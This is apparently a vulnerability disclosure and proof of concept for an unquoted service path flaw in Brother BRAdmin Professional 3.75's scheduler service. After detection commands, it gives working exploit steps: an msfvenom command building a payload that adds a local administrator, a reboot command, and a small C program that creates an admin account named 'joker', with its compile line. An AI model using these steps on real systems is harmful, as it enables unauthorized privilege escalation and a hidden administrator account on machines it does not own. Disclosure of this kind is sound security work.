# BRAdmin Professional 3.75 - Unquoted Service Path *"BRAdmin Professional 3.75 software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices."* ## Proof Of Concept If a user can insert a executable which is called as "BRAdmin" under the `C:\Program Files (x86)\Brother\` directory , local system privileges could be obtained by the user. For example, an user that has administrative privileges can obtain **`SYSTEM`** privileges through the vulnerable service. This situation is valuable, especially if additional writing permission is applied to `\Brother\` directory for unprivileged user. ``` #Detection of unquoted service path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BRAdmin" |findstr /i /v """ Brother BRAdminPro Scheduler BRA_Scheduler C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe Auto C:\>sc qc BRA_Scheduler [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BRA_Scheduler TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Brother BRAdminPro Scheduler DEPENDENCIES : SERVICE_START_NAME : LocalSystem ``` ### Steps to Reproduce: 1- User has a write privilege to `\Brother\` directory and creates msfvenom payload that adds new localadmin user to Windows computer. ``` msfvenom -p windows/adduser USER=unsafe PASS=In.line13 -f exe > BRAdmin.exe ``` ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW5zkMBfskxH_VwPbkz%2F-MW606TdKMT5kaEvNWVP%2F1.PNG?alt=media\&token=98b14885-f4be-4636-9b35-88f7bd0957c1) 2- Then user downloads this executable under the `\Brother\` directory and restarts the computer. ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW5zkMBfskxH_VwPbkz%2F-MW61MLiQVlXsP-RHuzg%2F2.PNG?alt=media\&token=87daf106-6185-468a-8df4-29a5c10cc971) ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW61NnxEi2SLYr2jRfO%2F-MW61SiZLh4N3XUrf6iS%2F3.PNG?alt=media\&token=c49a70bc-fdca-4baa-8fce-58d8b898c61d) For restarting computer from command line: ``` shutdown /r /t 0 ``` 3- After the restarting process , `unsafe` user will be created and added the local Administrators group. ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW62vm1QrzGWWCEVBaQ%2F-MW63ikVCka-O_O1Fz_f%2F4.PNG?alt=media\&token=14d54279-6849-4964-97bf-2630e65aa112) Windows Defender will detect the `BRAdmin.exe` executable as malicious after the `unsafe`user is added the local administrators group if target didn't make last Windows update properly. ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW63joxx3I9hipyVbs1%2F-MW67LrjVf9X8HtXyIAr%2F5.PNG?alt=media\&token=86bb2f61-89e3-4785-a8d7-6c926debe1d0) Or below code could be used after compiling with gcc. ``` #include int main () { int i; i = system("net user joker j@k3r.. /add & net localgroup Administrators joker /add"); return 0; } ``` `i686-w64-mingw32-gcc addLocalAdmin.c -lws2_32 -o add.exe` {% embed url="" %} 
# Author: Metin Yunus Kandemir